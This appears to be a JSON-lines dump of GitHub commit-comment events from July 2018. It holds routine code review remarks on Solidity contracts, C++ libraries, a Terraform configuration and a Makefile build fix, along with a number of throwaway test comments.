{"id":"7911173683","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/cadet"},"payload":{"comment":{"id":29577380,"position":24,"line":29,"path":"terraform/cadet/inputs.tf","commit_id":"d2cb217e79917320c24b08ee3128cdaf39c94eeb","created_at":"2018-07-03T08:56:37Z","updated_at":"2018-07-03T08:56:37Z","author_association":"MEMBER","body":"Terraform state files for prod and staging will only exist on the ec2 build server and the remote state on the s3 bucket. Is this okay?\r\n\r\nI've looked through the terraform docs and found `aws_kms_secret`, if the above security is not okay"}},"created_at":"2018-07-03T08:56:37Z"}
{"id":"7911176772","type":"CommitCommentEvent","actor":{"login":"tadadell0722"},"repo":{"name":"tadadell0722/awesome"},"payload":{"comment":{"id":29577385,"position":5,"line":9,"path":"test.html","commit_id":"ecb62834e68abf4859589c05c2f9e3c58f2745d4","created_at":"2018-07-03T08:57:11Z","updated_at":"2018-07-03T08:57:11Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-03T08:57:11Z"}
{"id":"7911177924","type":"CommitCommentEvent","actor":{"login":"harishkrupo"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29577390,"position":26,"line":1706,"path":"src/egl/drivers/dri2/egl_dri2.c","commit_id":"77dccee24134d9a59c8916fe4dcd734babbad412","created_at":"2018-07-03T08:57:23Z","updated_at":"2018-07-03T08:57:23Z","author_association":"OWNER","body":"In any case, I will send the framework patches to the ML. will discuss with the folks here and check with them for i965."}},"created_at":"2018-07-03T08:57:23Z"}
{"id":"7911186306","type":"CommitCommentEvent","actor":{"login":"BlazDT"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29577404,"position":4,"line":36,"path":"EnglishFilter/sections/general_elemhide.txt","commit_id":"63e316a68cc8d07f7e772bce175d930e79fec49a","created_at":"2018-07-03T08:58:55Z","updated_at":"2018-07-03T08:58:55Z","author_association":"CONTRIBUTOR","body":"I have seen it on a few sites and French filter already has this generic rule."}},"created_at":"2018-07-03T08:58:55Z"}
{"id":"7911188547","type":"CommitCommentEvent","actor":{"login":"syb413"},"repo":{"name":"wangyurzee7/LibraryManagementSystem"},"payload":{"comment":{"id":29577409,"position":null,"line":null,"path":null,"commit_id":"62924794f3ac61bee88aa152c3b7928de243b075","created_at":"2018-07-03T08:59:21Z","updated_at":"2018-07-03T08:59:21Z","author_association":"CONTRIBUTOR","body":"So sad that you didn't fixed them all, there even existed one more wyzs bug."}},"created_at":"2018-07-03T08:59:21Z"}
{"id":"7911190889","type":"CommitCommentEvent","actor":{"login":"ucotta"},"repo":{"name":"fmalekpour/JSON"},"payload":{"comment":{"id":29577411,"position":null,"line":null,"path":null,"commit_id":"d067274c89775636b7b188b21312d88d5e970d50","created_at":"2018-07-03T08:59:47Z","updated_at":"2018-07-03T08:59:47Z","author_association":"NONE","body":"Thanks for the changes, you've saved me this work! 👍 "}},"created_at":"2018-07-03T08:59:47Z"}
{"id":"7911194285","type":"CommitCommentEvent","actor":{"login":"syb413"},"repo":{"name":"wangyurzee7/LibraryManagementSystem"},"payload":{"comment":{"id":29577428,"position":null,"line":null,"path":null,"commit_id":"62924794f3ac61bee88aa152c3b7928de243b075","created_at":"2018-07-03T09:00:24Z","updated_at":"2018-07-03T09:00:24Z","author_association":"CONTRIBUTOR","body":"So sad that you hadn't fixed them all before deadline, there was even one wyz's bug which remained till now.\r\n\r\n"}},"created_at":"2018-07-03T09:00:24Z"}
{"id":"7911203244","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/documenting-with-git"},"payload":{"comment":{"id":29577444,"position":null,"line":null,"path":null,"commit_id":"f93bc4b5f73861533d6d835b76de59e87ecd3aa6","created_at":"2018-07-03T09:02:01Z","updated_at":"2018-07-03T09:02:01Z","author_association":"OWNER","body":"**My first nano-project is to figure out how to organize information in repository according to the GSS canvas**"}},"created_at":"2018-07-03T09:02:01Z"}
{"id":"7911205087","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"WeAreROLI/JUCE"},"payload":{"comment":{"id":29577447,"position":688,"line":1591,"path":"modules/juce_opengl/opengl/juce_OpenGLGraphicsContext.cpp","commit_id":"0d1c72f0b13e85865ca5cee9d9d517a3945f632a","created_at":"2018-07-03T09:02:22Z","updated_at":"2018-07-03T09:02:22Z","author_association":"NONE","body":"Note that removing this line causes sliders to look wrong in the JUCE demo using the OpenGL renderer with LookAndFeel_V3 in the WidgetsDemo's Sliders tab (on latest develop).\r\nBut adding a `shaderQuadQueue.flush()` call instead makes it look right again. I wonder if that's exposing another bug or whether this necessary flush is triggered by the `disableTextures` call by design.."}},"created_at":"2018-07-03T09:02:22Z"}
{"id":"7911215785","type":"CommitCommentEvent","actor":{"login":"bluemarvin"},"repo":{"name":"MozillaReality/FirefoxReality"},"payload":{"comment":{"id":29577469,"position":30,"line":156,"path":"app/src/common/shared/org/mozilla/vrbrowser/VRBrowserActivity.java","commit_id":"cb85f4914eac5ab65c9b35fbdf40652a6fe6a8e9","created_at":"2018-07-03T09:04:20Z","updated_at":"2018-07-03T09:04:20Z","author_association":"COLLABORATOR","body":"This should only be done once when the app is created. Sebastian provided a PR that showed the proper way to handle this, I'm not sure why it wasn't used. Please refer to the PR he provided to fix this."}},"created_at":"2018-07-03T09:04:20Z"}
{"id":"7911217423","type":"CommitCommentEvent","actor":{"login":"Webuz37"},"repo":{"name":"Webuz37/New1"},"payload":{"comment":{"id":29577471,"position":1,"line":1,"path":"README.md","commit_id":"59074a76fb582da0df1337a5eb76575e0febf935","created_at":"2018-07-03T09:04:39Z","updated_at":"2018-07-03T09:04:39Z","author_association":"OWNER","body":"<h1>test</h1>"}},"created_at":"2018-07-03T09:04:39Z"}
{"id":"7911220702","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29577478,"position":47,"line":47,"path":"contracts/FundsSplitter.sol","commit_id":"cba4bc351bc451ba8a3cf7cb0699ad91286eea39","created_at":"2018-07-03T09:05:17Z","updated_at":"2018-07-03T09:05:17Z","author_association":"NONE","body":"Rather than doing these `bob !=` checks at the \"point of use\" of `bob`, you should check for that at the \"point of set\" of `bob`. No need to check every time a split is made if it has not changed."}},"created_at":"2018-07-03T09:05:17Z"}
{"id":"7911225229","type":"CommitCommentEvent","actor":{"login":"zhenshuitieniu"},"repo":{"name":"finals/bcache"},"payload":{"comment":{"id":29577492,"position":null,"line":null,"path":null,"commit_id":"cf3624893564645d925d2a8196b99fe01c3cfce4","created_at":"2018-07-03T09:06:08Z","updated_at":"2018-07-03T09:06:08Z","author_association":"NONE","body":"hello，when i used community of kernel 4.14.52，in passthrough mode， after kickoff cache device，bcacheX will hang several request。\r\nBut use your git src code，it not hang，can U take a patch for kernel 4.14.52"}},"created_at":"2018-07-03T09:06:08Z"}
{"id":"7911228702","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29577501,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T09:06:47Z","updated_at":"2018-07-03T09:06:47Z","author_association":"NONE","body":"It gives two reason why such functional combo patches are not encouraged:\r\n1. each one adds complexity for in the sum for less elo per part\r\n2. their is a good chance to simplify away the single parts \r\n\r\nAnd for this patch which is a combo of 5 different ideas this effects are magnified.\r\n\r\nBut in general I'am not against functional combo patches. But it should be combined so little number of patches as possible and the raised complexity should be compensated by higher test bounds (which also reduce the chance of a simplification). Par example: two functional patch combo needs SPRT[0,6], three functional patch combo needs SPRT[0,7] and so one."}},"created_at":"2018-07-03T09:06:47Z"}
{"id":"7911240747","type":"CommitCommentEvent","actor":{"login":"pdparchitect"},"repo":{"name":"pdparchitect/sss"},"payload":{"comment":{"id":29577515,"position":4,"line":3,"path":"README.md","commit_id":"fd67e104ff65fa87e5e56cde470512d121bf00de","created_at":"2018-07-03T09:09:06Z","updated_at":"2018-07-03T09:09:06Z","author_association":"OWNER","body":"Are you sure?"}},"created_at":"2018-07-03T09:09:06Z"}
{"id":"7911242834","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29577519,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T09:09:28Z","updated_at":"2018-07-03T09:09:28Z","author_association":"NONE","body":"IMO testing it also further at higher time control maybe 120s or 180s to see if it scales and truly accumulate elo is important."}},"created_at":"2018-07-03T09:09:28Z"}
{"id":"7911244305","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577522,"position":13,"line":13,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:09:45Z","updated_at":"2018-07-03T09:09:45Z","author_association":"NONE","body":"Have you tried using `enum`s or `uint constant`? That could be cheaper. Of course, the client-side would need to \"know\" those values too."}},"created_at":"2018-07-03T09:09:45Z"}
{"id":"7911245807","type":"CommitCommentEvent","actor":{"login":"pekkaklarck"},"repo":{"name":"juusoi/robotframework"},"payload":{"comment":{"id":29577527,"position":17,"line":241,"path":"atest/testdata/standard_libraries/collections/dictionary.robot","commit_id":"e13cdb79db203262b9d53386df774ee6047cbd94","created_at":"2018-07-03T09:10:02Z","updated_at":"2018-07-03T09:10:02Z","author_association":"NONE","body":"No need to use variable like `${D4}` here, using a normal string is enough. It could be something explicit like `this is a string, not a dict`."}},"created_at":"2018-07-03T09:10:02Z"}
{"id":"7911245968","type":"CommitCommentEvent","actor":{"login":"JakeBozward"},"repo":{"name":"fboyle2001/SixthFormApp"},"payload":{"comment":{"id":29577530,"position":null,"line":null,"path":null,"commit_id":"75fef670038281ac6bdb1e1d20a552f8050cfbe3","created_at":"2018-07-03T09:10:03Z","updated_at":"2018-07-03T09:10:03Z","author_association":"COLLABORATOR","body":"Hey\r\n"}},"created_at":"2018-07-03T09:10:03Z"}
{"id":"7911248317","type":"CommitCommentEvent","actor":{"login":"pekkaklarck"},"repo":{"name":"juusoi/robotframework"},"payload":{"comment":{"id":29577536,"position":17,"line":736,"path":"src/robot/libraries/Collections.py","commit_id":"e13cdb79db203262b9d53386df774ee6047cbd94","created_at":"2018-07-03T09:10:28Z","updated_at":"2018-07-03T09:10:28Z","author_association":"NONE","body":"The `else` branch is unnecessary."}},"created_at":"2018-07-03T09:10:28Z"}
{"id":"7911248497","type":"CommitCommentEvent","actor":{"login":"tnywal4"},"repo":{"name":"tnywal4/BW-Family-Farm-and-Rescue"},"payload":{"comment":{"id":29577537,"position":null,"line":null,"path":null,"commit_id":"05d7b57b0ca22deb930cea81b0b2487a8938c380","created_at":"2018-07-03T09:10:30Z","updated_at":"2018-07-03T09:10:30Z","author_association":"OWNER","body":"[331125341.edited.txt](https://github.com/tnywal4/BW-Family-Farm-and-Rescue/files/2158526/331125341.edited.txt)\r\n![photo-1-3](https://user-images.githubusercontent.com/23156199/42210580-fc198f12-7e76-11e8-8e2b-199f9a678421.jpg)\r\n![photo-1-3](https://user-images.githubusercontent.com/23156199/42210590-0310661a-7e77-11e8-9819-66e225bda917.jpg)\r\n"}},"created_at":"2018-07-03T09:10:30Z"}
{"id":"7911249584","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577539,"position":59,"line":59,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:10:41Z","updated_at":"2018-07-03T09:10:41Z","author_association":"NONE","body":"If you use `emit`, you cannot keep it as low as `pragma solidity ^0.4.17`. You have to bump it up to when `emit` was introduced."}},"created_at":"2018-07-03T09:10:41Z"}
{"id":"7911252269","type":"CommitCommentEvent","actor":{"login":"fybwid"},"repo":{"name":"yegor256/0pdd"},"payload":{"comment":{"id":29577546,"position":null,"line":null,"path":null,"commit_id":"745073b29a952e6023fa2306a0a53b6817356e8c","created_at":"2018-07-03T09:11:11Z","updated_at":"2018-07-03T09:11:11Z","author_association":"NONE","body":"Thank you @yegor256."}},"created_at":"2018-07-03T09:11:11Z"}
{"id":"7911253053","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"wongsyrone/nand2tetris"},"payload":{"comment":{"id":29577548,"position":16,"line":56,"path":"projects/02/ALU.hdl","commit_id":"c2df0f284cce209af9d31428a7ac7be3aaad56e9","created_at":"2018-07-03T09:11:20Z","updated_at":"2018-07-03T09:11:20Z","author_association":"OWNER","body":"Based on these statements, it's obvious that it will do both sides and select result afterward.\r\nMux is the core part for conditions."}},"created_at":"2018-07-03T09:11:20Z"}
{"id":"7911256666","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577555,"position":29,"line":29,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:12:00Z","updated_at":"2018-07-03T09:12:00Z","author_association":"NONE","body":"So if `second == 0` or `second > 3`, `second` always wins..."}},"created_at":"2018-07-03T09:12:00Z"}
{"id":"7911262285","type":"CommitCommentEvent","actor":{"login":"Simona416"},"repo":{"name":"Simona416/learngit"},"payload":{"comment":{"id":29577565,"position":null,"line":null,"path":null,"commit_id":"905c7fb285ebcd7dd82dce6c7213caf9afddd95a","created_at":"2018-07-03T09:13:01Z","updated_at":"2018-07-03T09:13:01Z","author_association":"OWNER","body":"测试commit"}},"created_at":"2018-07-03T09:13:01Z"}
{"id":"7911264311","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577573,"position":37,"line":37,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:13:24Z","updated_at":"2018-07-03T09:13:24Z","author_association":"NONE","body":"Not sure why you keep `gameId` since it is the index at which it is in the mapping. You need the id to get the game `struct` anyway."}},"created_at":"2018-07-03T09:13:24Z"}
{"id":"7911265605","type":"CommitCommentEvent","actor":{"login":"Ecco"},"repo":{"name":"zardam/epsilon"},"payload":{"comment":{"id":29577575,"position":237,"line":385,"path":"escher/src/text_area.cpp","commit_id":"0b61aaa6a29775c1ef0e3c675c0705776f26965f","created_at":"2018-07-03T09:13:38Z","updated_at":"2018-07-03T09:13:38Z","author_association":"NONE","body":"I didn't know triple-quoted strings were a thing. Thanks for the clarification! This will help fix [this bug](https://github.com/numworks/epsilon/issues/559). Thanks!"}},"created_at":"2018-07-03T09:13:38Z"}
{"id":"7911265709","type":"CommitCommentEvent","actor":{"login":"pekkaklarck"},"repo":{"name":"juusoi/robotframework"},"payload":{"comment":{"id":29577576,"position":5,"line":594,"path":"src/robot/libraries/Collections.py","commit_id":"e13cdb79db203262b9d53386df774ee6047cbd94","created_at":"2018-07-03T09:13:40Z","updated_at":"2018-07-03T09:13:40Z","author_association":"NONE","body":"We try to avoid empty lines inside methods. \r\n\r\nAs a nitpick comment, `if` in the helper method name feels somewhat unnecessary. Just `_check_is_dictionary` or perhaps `_validate_dictionary` could be better."}},"created_at":"2018-07-03T09:13:40Z"}
{"id":"7911270900","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577588,"position":32,"line":32,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:14:32Z","updated_at":"2018-07-03T09:14:32Z","author_association":"NONE","body":"You can make this a `public` field."}},"created_at":"2018-07-03T09:14:32Z"}
{"id":"7911271440","type":"CommitCommentEvent","actor":{"login":"hugo082"},"repo":{"name":"hugo082/pinax-theme-bootstrap"},"payload":{"comment":{"id":29577591,"position":null,"line":null,"path":null,"commit_id":"39547b1c40016a78db9c3c82032ee2ab6cdc6b61","created_at":"2018-07-03T09:14:38Z","updated_at":"2018-07-03T09:14:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/hA5sRRQR/1-test)"}},"created_at":"2018-07-03T09:14:38Z"}
{"id":"7911272234","type":"CommitCommentEvent","actor":{"login":"hugo082"},"repo":{"name":"hugo082/pinax-theme-bootstrap"},"payload":{"comment":{"id":29577594,"position":null,"line":null,"path":null,"commit_id":"845e6511aebc826c4b331d0255ea3a49d29fc897","created_at":"2018-07-03T09:14:46Z","updated_at":"2018-07-03T09:14:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/hA5sRRQR/1-test)"}},"created_at":"2018-07-03T09:14:46Z"}
{"id":"7911272494","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577595,"position":48,"line":48,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:14:50Z","updated_at":"2018-07-03T09:14:50Z","author_association":"NONE","body":"This too can be public."}},"created_at":"2018-07-03T09:14:50Z"}
{"id":"7911279308","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577614,"position":19,"line":19,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:16:03Z","updated_at":"2018-07-03T09:16:03Z","author_association":"NONE","body":"Consider adding `indexed` to the fields that can reasonably be expected to be filtered from the client side."}},"created_at":"2018-07-03T09:16:03Z"}
{"id":"7911286587","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"WeAreROLI/JUCE"},"payload":{"comment":{"id":29577624,"position":688,"line":1591,"path":"modules/juce_opengl/opengl/juce_OpenGLGraphicsContext.cpp","commit_id":"0d1c72f0b13e85865ca5cee9d9d517a3945f632a","created_at":"2018-07-03T09:17:22Z","updated_at":"2018-07-03T09:17:22Z","author_association":"NONE","body":"Looks like if I remove this call, but add the proper checks for texture changes - everything works fine - see https://github.com/soundradix/JUCE/commit/1618927bfcd66cb6bfbc76280a700393b6f1d273"}},"created_at":"2018-07-03T09:17:22Z"}
{"id":"7911290335","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577631,"position":29,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-03T09:18:02Z","updated_at":"2018-07-03T09:18:02Z","author_association":"NONE","body":"Super hair-splitting here, but \"what if\" `player1` was legit `0`? Should you not have checked that `msg.sender != 0` in `createGame`?"}},"created_at":"2018-07-03T09:18:02Z"}
{"id":"7911293301","type":"CommitCommentEvent","actor":{"login":"maggsweb"},"repo":{"name":"maggsweb/MyPDO"},"payload":{"comment":{"id":29577642,"position":null,"line":null,"path":null,"commit_id":"94361bf2b9f8d66568c60f38d751f27037ebe430","created_at":"2018-07-03T09:18:35Z","updated_at":"2018-07-03T09:18:35Z","author_association":"OWNER","body":"Integrating StyleCI Web Coding Standards"}},"created_at":"2018-07-03T09:18:35Z"}
{"id":"7911295064","type":"CommitCommentEvent","actor":{"login":"Alihusseindossa"},"repo":{"name":"CompleteBlenderCreator/01-Introduction-And-Setup"},"payload":{"comment":{"id":29577645,"position":null,"line":null,"path":null,"commit_id":"06130d268e8c6f33cd3bd8379e1cb4ff21595b31","created_at":"2018-07-03T09:18:54Z","updated_at":"2018-07-03T09:18:54Z","author_association":"NONE","body":"Hello, my name is Alihussein, i just started the blender course and its slightly confusing, i hope to get through it. Thanks.\r\n\r\n"}},"created_at":"2018-07-03T09:18:54Z"}
{"id":"7911297261","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577654,"position":32,"line":70,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-03T09:19:18Z","updated_at":"2018-07-03T09:19:18Z","author_association":"NONE","body":"Interesting, I did not see a `require(player1Proof != 0);`"}},"created_at":"2018-07-03T09:19:18Z"}
{"id":"7911298811","type":"CommitCommentEvent","actor":{"login":"enending"},"repo":{"name":"enending/dd"},"payload":{"comment":{"id":29577656,"position":null,"line":null,"path":null,"commit_id":"38ef4b49040090196589a2d9de74c3d66989c126","created_at":"2018-07-03T09:19:35Z","updated_at":"2018-07-03T09:19:35Z","author_association":"OWNER","body":"zczczc"}},"created_at":"2018-07-03T09:19:35Z"}
{"id":"7911301248","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29577665,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T09:20:01Z","updated_at":"2018-07-03T09:20:01Z","author_association":"NONE","body":"My wireless is not working :( http://ix.io/1fQH"}},"created_at":"2018-07-03T09:20:01Z"}
{"id":"7911303242","type":"CommitCommentEvent","actor":{"login":"mikepauer"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":29577670,"position":null,"line":null,"path":null,"commit_id":"5f22905a31bc326c9ed987ad0fe36a510f65fd75","created_at":"2018-07-03T09:20:22Z","updated_at":"2018-07-03T09:20:22Z","author_association":"OWNER","body":"I'll also mention, I only have until Friday to work on it... Friday I leave for a 3 week tour of Europe so I won't have access for any more research or modifications until I get back."}},"created_at":"2018-07-03T09:20:22Z"}
{"id":"7911303459","type":"CommitCommentEvent","actor":{"login":"gamelinux"},"repo":{"name":"gamelinux/passivedns"},"payload":{"comment":{"id":29577671,"position":5,"line":4,"path":"configure.ac","commit_id":"945fcea0334c2915e2ebc0322f5d01d208b97d13","created_at":"2018-07-03T09:20:24Z","updated_at":"2018-07-03T09:20:24Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-03T09:20:24Z"}
{"id":"7911303538","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577672,"position":78,"line":78,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:20:25Z","updated_at":"2018-07-03T09:20:25Z","author_association":"NONE","body":"My preference goes to a function that advertises the hashing mechanism and let the users of this function decide."}},"created_at":"2018-07-03T09:20:25Z"}
{"id":"7911303766","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29577673,"position":null,"line":null,"path":null,"commit_id":"b3e2b29d796fcea8a4955755f52c4a1581f2736f","created_at":"2018-07-03T09:20:27Z","updated_at":"2018-07-03T09:20:27Z","author_association":"NONE","body":"This commit breaks the build on linux x86_64:\r\n```\r\n/usr/include/c++/5/bits/random.tcc:1468:42: error: no matching function for call to ‘max(float, const double&)’\r\n```\r\nThis is due to the `-fsingle-precision-constant` options that causes problem with the C++ STL. This option is probably only useful for very low end platforms such as the Pi or mobile Android devices. I suggest the following patch:\r\n```\r\ndiff --git a/Makefile b/Makefile\r\nindex e4d639a..86838a0 100644\r\n--- a/Makefile\r\n+++ b/Makefile\r\n@@ -119,11 +119,11 @@ endif\r\n \r\n        ifeq ($(WITH_DYNAREC), $(filter $(WITH_DYNAREC), x86_64 x64))\r\n                CFLAGS += -DTARGET_LINUX_x64 -D TARGET_NO_AREC\r\n-               SINGLE_PREC_FLAGS=1\r\n+               SINGLE_PREC_FLAGS=0\r\n                CXXFLAGS += -fexceptions\r\n        else ifeq ($(WITH_DYNAREC), x86)\r\n                CFLAGS += -m32 -D TARGET_LINUX_x86 -D TARGET_NO_AREC\r\n-               SINGLE_PREC_FLAGS=1\r\n+               SINGLE_PREC_FLAGS=0\r\n                CXXFLAGS += -fno-exceptions\r\n                MFLAGS += -m32\r\n                ASFLAGS += --32\r\n```"}},"created_at":"2018-07-03T09:20:27Z"}
{"id":"7911304369","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577674,"position":5,"line":71,"path":"Convex_hull_3/include/CGAL/convex_hull_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T09:20:34Z","updated_at":"2018-07-03T09:20:34Z","author_association":"MEMBER","body":"The [C++ norm about default arguments][1] is rather surprising. Defaults to template arguments (or to [function arguments][2]) can be added by any redeclaration of the template (or function), but a default cannot be declared twice. The most surprising example is that one:\r\n```C++\r\ntemplate<typename T1, typename T2 = int> class A;\r\ntemplate<typename T1 = int, typename T2> class A;\r\n```\r\nthat gives defaults to both template arguments of `A`.\r\n\r\n\r\n[1]: https://en.cppreference.com/w/cpp/language/template_parameters#Default_template_arguments\r\n[2]: https://en.cppreference.com/w/cpp/language/default_arguments"}},"created_at":"2018-07-03T09:20:34Z"}
{"id":"7911305922","type":"CommitCommentEvent","actor":{"login":"maxGimeno"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577677,"position":32,"line":53,"path":"Convex_hull_3/doc/Convex_hull_3/CGAL/Extreme_points_traits_adapter_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T09:20:50Z","updated_at":"2018-07-03T09:20:50Z","author_association":"COLLABORATOR","body":"I miss the point of this. I thought this function was supposed to avoid having to write the template parameters. With a default traits, it will require a template parameter, killing half the point of the function."}},"created_at":"2018-07-03T09:20:50Z"}
{"id":"7911306861","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577678,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:20:59Z","updated_at":"2018-07-03T09:20:59Z","author_association":"OWNER","body":"### 안녕"}},"created_at":"2018-07-03T09:20:59Z"}
{"id":"7911308024","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577679,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:21:12Z","updated_at":"2018-07-03T09:21:12Z","author_association":"OWNER","body":"**abcd**"}},"created_at":"2018-07-03T09:21:12Z"}
{"id":"7911308532","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577681,"position":43,"line":88,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-03T09:21:17Z","updated_at":"2018-07-03T09:21:17Z","author_association":"NONE","body":"Looks not necessary if you have the below `require`."}},"created_at":"2018-07-03T09:21:17Z"}
{"id":"7911309565","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577684,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:21:28Z","updated_at":"2018-07-03T09:21:28Z","author_association":"OWNER","body":"_italic_"}},"created_at":"2018-07-03T09:21:28Z"}
{"id":"7911311224","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577688,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:21:45Z","updated_at":"2018-07-03T09:21:45Z","author_association":"OWNER","body":"`<div>div1</div>`"}},"created_at":"2018-07-03T09:21:45Z"}
{"id":"7911313091","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577692,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:22:04Z","updated_at":"2018-07-03T09:22:04Z","author_association":"OWNER","body":"[http://study.kimgura.net](url)"}},"created_at":"2018-07-03T09:22:04Z"}
{"id":"7911314325","type":"CommitCommentEvent","actor":{"login":"Similarities"},"repo":{"name":"Similarities/hello-world"},"payload":{"comment":{"id":29577699,"position":null,"line":null,"path":null,"commit_id":"45f5cdcb1963127f09cd19f313bfc180d5a27651","created_at":"2018-07-03T09:22:18Z","updated_at":"2018-07-03T09:22:18Z","author_association":"OWNER","body":"this is learning learning learning"}},"created_at":"2018-07-03T09:22:18Z"}
{"id":"7911315173","type":"CommitCommentEvent","actor":{"login":"oli999"},"repo":{"name":"oli999/test15"},"payload":{"comment":{"id":29577700,"position":null,"line":null,"path":null,"commit_id":"e7bd7a9086d0013b099f2827419105f073c47b3e","created_at":"2018-07-03T09:22:27Z","updated_at":"2018-07-03T09:22:27Z","author_association":"OWNER","body":"1. \r\n\r\n- [ ] dd\r\nd\r\nd"}},"created_at":"2018-07-03T09:22:27Z"}
{"id":"7911315969","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29577701,"position":84,"line":84,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-03T09:22:35Z","updated_at":"2018-07-03T09:22:35Z","author_association":"NONE","body":"You do not do input sanitation on `choice`."}},"created_at":"2018-07-03T09:22:35Z"}
